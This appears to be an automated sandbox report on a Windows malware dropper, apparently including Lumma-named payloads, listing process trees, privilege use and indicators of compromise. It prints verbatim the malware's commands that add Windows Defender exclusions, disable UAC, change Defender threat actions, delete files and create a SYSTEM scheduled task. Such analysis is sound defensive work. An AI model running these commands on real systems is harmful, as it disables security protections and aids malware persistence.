\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 svhoost.exe -
Suspicious behavior: EnumeratesProcesses 55 IoCs
Processes:
b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exeaxplont.exeaxplont.exeRegAsm.exepowershell.exeOne.exegLev4JkALuFVmMKAIsGAWyIf.exesvhoost.exepowershell.exepowershell.exe8fdEuUbfYToYKhDcRYPeLZ0N.exepowershell.exeaxplont.exepowershell.exepid process 3696 b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe 3696 b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe 3812 axplont.exe 3812 axplont.exe 3336 axplont.exe 3336 axplont.exe 4128 RegAsm.exe 4128 RegAsm.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 3068 One.exe 3068 One.exe 3068 One.exe 3068 One.exe 3068 One.exe 3068 One.exe 3068 One.exe 3068 One.exe 3068 One.exe 3068 One.exe 3068 One.exe 3068 One.exe 3068 One.exe 3068 One.exe 3068 One.exe 3068 One.exe 3068 One.exe 3068 One.exe 5452 gLev4JkALuFVmMKAIsGAWyIf.exe 5452 gLev4JkALuFVmMKAIsGAWyIf.exe 5452 gLev4JkALuFVmMKAIsGAWyIf.exe 5452 gLev4JkALuFVmMKAIsGAWyIf.exe 3020 svhoost.exe 3020 svhoost.exe 2152 powershell.exe 2152 powershell.exe 2152 powershell.exe 3020 svhoost.exe 3020 svhoost.exe 3020 svhoost.exe 3020 svhoost.exe 5272 powershell.exe 5272 powershell.exe 5272 powershell.exe 5564 8fdEuUbfYToYKhDcRYPeLZ0N.exe 5564 8fdEuUbfYToYKhDcRYPeLZ0N.exe 1072 powershell.exe 1072 powershell.exe 408 axplont.exe 408 axplont.exe 1072 powershell.exe 4324 powershell.exe 4324 powershell.exe 4324 powershell.exe -
Suspicious use of AdjustPrivilegeToken 59 IoCs
Processes:
One.exefile300un.exeAddInProcess32.exepowershell.exe8fdEuUbfYToYKhDcRYPeLZ0N.exegLev4JkALuFVmMKAIsGAWyIf.exesvhoost.exepowershell.exeWMIC.exeRegAsm.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3068 One.exe Token: SeBackupPrivilege 3068 One.exe Token: SeSecurityPrivilege 3068 One.exe Token: SeSecurityPrivilege 3068 One.exe Token: SeSecurityPrivilege 3068 One.exe Token: SeSecurityPrivilege 3068 One.exe Token: SeDebugPrivilege 4976 file300un.exe Token: SeDebugPrivilege 4748 AddInProcess32.exe Token: SeDebugPrivilege 1600 powershell.exe Token: SeDebugPrivilege 5564 8fdEuUbfYToYKhDcRYPeLZ0N.exe Token: SeManageVolumePrivilege 5452 gLev4JkALuFVmMKAIsGAWyIf.exe Token: SeDebugPrivilege 3020 svhoost.exe Token: SeDebugPrivilege 2152 powershell.exe Token: SeIncreaseQuotaPrivilege 5880 WMIC.exe Token: SeSecurityPrivilege 5880 WMIC.exe Token: SeTakeOwnershipPrivilege 5880 WMIC.exe Token: SeLoadDriverPrivilege 5880 WMIC.exe Token: SeSystemProfilePrivilege 5880 WMIC.exe Token: SeSystemtimePrivilege 5880 WMIC.exe Token: SeProfSingleProcessPrivilege 5880 WMIC.exe Token: SeIncBasePriorityPrivilege 5880 WMIC.exe Token: SeCreatePagefilePrivilege 5880 WMIC.exe Token: SeBackupPrivilege 5880 WMIC.exe Token: SeRestorePrivilege 5880 WMIC.exe Token: SeShutdownPrivilege 5880 WMIC.exe Token: SeDebugPrivilege 5880 WMIC.exe Token: SeSystemEnvironmentPrivilege 5880 WMIC.exe Token: SeRemoteShutdownPrivilege 5880 WMIC.exe Token: SeUndockPrivilege 5880 WMIC.exe Token: SeManageVolumePrivilege 5880 WMIC.exe Token: 33 5880 WMIC.exe Token: 34 5880 WMIC.exe Token: 35 5880 WMIC.exe Token: 36 5880 WMIC.exe Token: SeIncreaseQuotaPrivilege 5880 WMIC.exe Token: SeSecurityPrivilege 5880 WMIC.exe Token: SeTakeOwnershipPrivilege 5880 WMIC.exe Token: SeLoadDriverPrivilege 5880 WMIC.exe Token: SeSystemProfilePrivilege 5880 WMIC.exe Token: SeSystemtimePrivilege 5880 WMIC.exe Token: SeProfSingleProcessPrivilege 5880 WMIC.exe Token: SeIncBasePriorityPrivilege 5880 WMIC.exe Token: SeCreatePagefilePrivilege 5880 WMIC.exe Token: SeBackupPrivilege 5880 WMIC.exe Token: SeRestorePrivilege 5880 WMIC.exe Token: SeShutdownPrivilege 5880 WMIC.exe Token: SeDebugPrivilege 5880 WMIC.exe Token: SeSystemEnvironmentPrivilege 5880 WMIC.exe Token: SeRemoteShutdownPrivilege 5880 WMIC.exe Token: SeUndockPrivilege 5880 WMIC.exe Token: SeManageVolumePrivilege 5880 WMIC.exe Token: 33 5880 WMIC.exe Token: 34 5880 WMIC.exe Token: 35 5880 WMIC.exe Token: 36 5880 WMIC.exe Token: SeDebugPrivilege 2096 RegAsm.exe Token: SeDebugPrivilege 5272 powershell.exe Token: SeDebugPrivilege 1072 powershell.exe Token: SeDebugPrivilege 4324 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exebg76dZhV9E7e0SJaoBx5AJjE.exepid process 3696 b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe 5988 bg76dZhV9E7e0SJaoBx5AJjE.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
bg76dZhV9E7e0SJaoBx5AJjE.exepid process 5988 bg76dZhV9E7e0SJaoBx5AJjE.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exeaxplont.exe33333.exeRegAsm.exelumma1234.exegold.exeswizzzz.exedescription pid process target process PID 3696 wrote to memory of 3812 3696 b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe axplont.exe PID 3696 wrote to memory of 3812 3696 b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe axplont.exe PID 3696 wrote to memory of 3812 3696 b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe axplont.exe PID 3812 wrote to memory of 1808 3812 axplont.exe 33333.exe PID 3812 wrote to memory of 1808 3812 axplont.exe 33333.exe PID 3812 wrote to memory of 1808 3812 axplont.exe 33333.exe PID 1808 wrote to memory of 2096 1808 33333.exe RegAsm.exe PID 1808 wrote to memory of 2096 1808 33333.exe RegAsm.exe PID 1808 wrote to memory of 2096 1808 33333.exe RegAsm.exe PID 1808 wrote to memory of 2096 1808 33333.exe RegAsm.exe PID 1808 wrote to memory of 2096 1808 33333.exe RegAsm.exe PID 1808 wrote to memory of 2096 1808 33333.exe RegAsm.exe PID 1808 wrote to memory of 2096 1808 33333.exe RegAsm.exe PID 1808 wrote to memory of 2096 1808 33333.exe RegAsm.exe PID 3812 wrote to memory of 3568 3812 axplont.exe fileosn.exe PID 3812 wrote to memory of 3568 3812 axplont.exe fileosn.exe PID 3812 wrote to memory of 3568 3812 axplont.exe fileosn.exe PID 2096 wrote to memory of 3020 2096 RegAsm.exe svhoost.exe PID 2096 wrote to memory of 3020 2096 RegAsm.exe svhoost.exe PID 2096 wrote to memory of 3020 2096 RegAsm.exe svhoost.exe PID 2096 wrote to memory of 3068 2096 RegAsm.exe One.exe PID 2096 wrote to memory of 3068 2096 RegAsm.exe One.exe PID 3812 wrote to memory of 4468 3812 axplont.exe lumma1234.exe PID 3812 wrote to memory of 4468 3812 axplont.exe lumma1234.exe PID 3812 wrote to memory of 4468 3812 axplont.exe lumma1234.exe PID 4468 wrote to memory of 2952 4468 lumma1234.exe RegAsm.exe PID 4468 wrote to memory of 2952 4468 lumma1234.exe RegAsm.exe PID 4468 wrote to memory of 2952 4468 lumma1234.exe RegAsm.exe PID 4468 wrote to memory of 2952 4468 lumma1234.exe RegAsm.exe PID 4468 wrote to memory of 2952 4468 lumma1234.exe RegAsm.exe PID 4468 wrote to memory of 2952 4468 lumma1234.exe RegAsm.exe PID 4468 wrote to memory of 2952 4468 lumma1234.exe RegAsm.exe PID 4468 wrote to memory of 2952 4468 lumma1234.exe RegAsm.exe PID 4468 wrote to memory of 2952 4468 lumma1234.exe RegAsm.exe PID 3812 wrote to memory of 2984 3812 axplont.exe gold.exe PID 3812 wrote to memory of 2984 3812 axplont.exe gold.exe PID 3812 wrote to memory of 2984 3812 axplont.exe gold.exe PID 2984 wrote to memory of 1548 2984 gold.exe RegAsm.exe PID 2984 wrote to memory of 1548 2984 gold.exe RegAsm.exe PID 2984 wrote to memory of 1548 2984 gold.exe RegAsm.exe PID 2984 wrote to memory of 4532 2984 gold.exe RegAsm.exe PID 2984 wrote to memory of 4532 2984 gold.exe RegAsm.exe PID 2984 wrote to memory of 4532 2984 gold.exe RegAsm.exe PID 2984 wrote to memory of 1916 2984 gold.exe RegAsm.exe PID 2984 wrote to memory of 1916 2984 gold.exe RegAsm.exe PID 2984 wrote to memory of 1916 2984 gold.exe RegAsm.exe PID 2984 wrote to memory of 1916 2984 gold.exe RegAsm.exe PID 2984 wrote to memory of 1916 2984 gold.exe RegAsm.exe PID 2984 wrote to memory of 1916 2984 gold.exe RegAsm.exe PID 2984 wrote to memory of 1916 2984 gold.exe RegAsm.exe PID 2984 wrote to memory of 1916 2984 gold.exe RegAsm.exe PID 2984 wrote to memory of 1916 2984 gold.exe RegAsm.exe PID 3812 wrote to memory of 1748 3812 axplont.exe sihclient.exe PID 3812 wrote to memory of 1748 3812 axplont.exe sihclient.exe PID 3812 wrote to memory of 1748 3812 axplont.exe sihclient.exe PID 1748 wrote to memory of 2088 1748 swizzzz.exe RegAsm.exe PID 1748 wrote to memory of 2088 1748 swizzzz.exe RegAsm.exe PID 1748 wrote to memory of 2088 1748 swizzzz.exe RegAsm.exe PID 1748 wrote to memory of 4128 1748 swizzzz.exe RegAsm.exe PID 1748 wrote to memory of 4128 1748 swizzzz.exe RegAsm.exe PID 1748 wrote to memory of 4128 1748 swizzzz.exe RegAsm.exe PID 1748 wrote to memory of 4128 1748 swizzzz.exe RegAsm.exe PID 1748 wrote to memory of 4128 1748 swizzzz.exe RegAsm.exe PID 1748 wrote to memory of 4128 1748 swizzzz.exe RegAsm.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
file300un.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe"C:\Users\Admin\AppData\Local\Temp\b097d587bcd2e7250cba4c4048e6c22ab00a662b8d45dbff9d7a8ac500b22696.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"5⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 36⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 2764⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"3⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 3004⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Checks computer location settings
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 56⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"3⤵
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\gLev4JkALuFVmMKAIsGAWyIf.exe"C:\Users\Admin\Pictures\gLev4JkALuFVmMKAIsGAWyIf.exe" /s5⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\8fdEuUbfYToYKhDcRYPeLZ0N.exe"C:\Users\Admin\Pictures\8fdEuUbfYToYKhDcRYPeLZ0N.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"6⤵
-
C:\Users\Admin\Pictures\bg76dZhV9E7e0SJaoBx5AJjE.exe"C:\Users\Admin\Pictures\bg76dZhV9E7e0SJaoBx5AJjE.exe"5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\Pictures\5hN4UciOtFCyoPjG18IKIh76.exe"C:\Users\Admin\Pictures\5hN4UciOtFCyoPjG18IKIh76.exe"5⤵
- Modifies firewall policy service
- Windows security bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\BozZtwN2ch7zu3w6ykr1G4Nt.exe"C:\Users\Admin\Pictures\BozZtwN2ch7zu3w6ykr1G4Nt.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSCA31.tmp\Install.exe.\Install.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSD51E.tmp\Install.exe.\Install.exe /NQHxdidUQs "385118" /S7⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"8⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 610⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 610⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 610⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 610⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force12⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bqGGCwwWIommTRgeuN" /SC once /ST 22:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSD51E.tmp\Install.exe\" 1g /pBjdiddHUx 385118 /S" /V1 /F8⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqGGCwwWIommTRgeuN"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bqGGCwwWIommTRgeuN9⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bqGGCwwWIommTRgeuN10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 8008⤵
- Program crash
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1808 -ip 18081⤵
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exeC:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv Gdl5ufjOBEqf6rJtqodfhA.0.21⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2984 -ip 29841⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSD51E.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSD51E.tmp\Install.exe 1g /pBjdiddHUx 385118 /S1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
